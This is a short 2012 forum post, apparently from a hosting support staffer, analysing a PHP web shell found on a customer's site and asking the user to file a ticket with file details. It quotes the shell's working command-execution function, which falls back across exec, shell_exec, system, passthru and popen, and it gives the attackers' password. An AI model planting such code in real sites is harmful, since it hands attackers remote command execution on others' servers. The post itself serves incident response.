 |
|
|
|
|
|
|
|
|
|
|
2012-06-06, 03:19 AM
|
#1 |
|
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
exploit
they are using the password '4ef44b514159705a45bead8633dc8a2a' appears to be a remote shell. The meat: Code:
function magic_execute($cmd)
{
$res=false;
if (function_exists('exec'))
{
@exec($cmd,$res);
$res = join("\n",$res);
}
else
if (function_exists('shell_exec'))
$res = @shell_exec($cmd);
else
if (function_exists('system'))
{
@ob_start();
@system($cmd);
$res = @ob_get_contents();
@ob_end_clean();
}
else
if(function_exists('passthru'))
{
@ob_start();
@passthru($cmd);
$res = @ob_get_contents();
@ob_end_clean();
}
else
if (@is_resource($f = @popen($cmd,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
return $res;
}
php filename.php and it'll output the source. file a ticket with where you found this, if you didn't remove it, make a note of the time on it, file permissions, ownership, etc. and I'll take a look.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
|
|
 |
|
|
Hybrid Mode
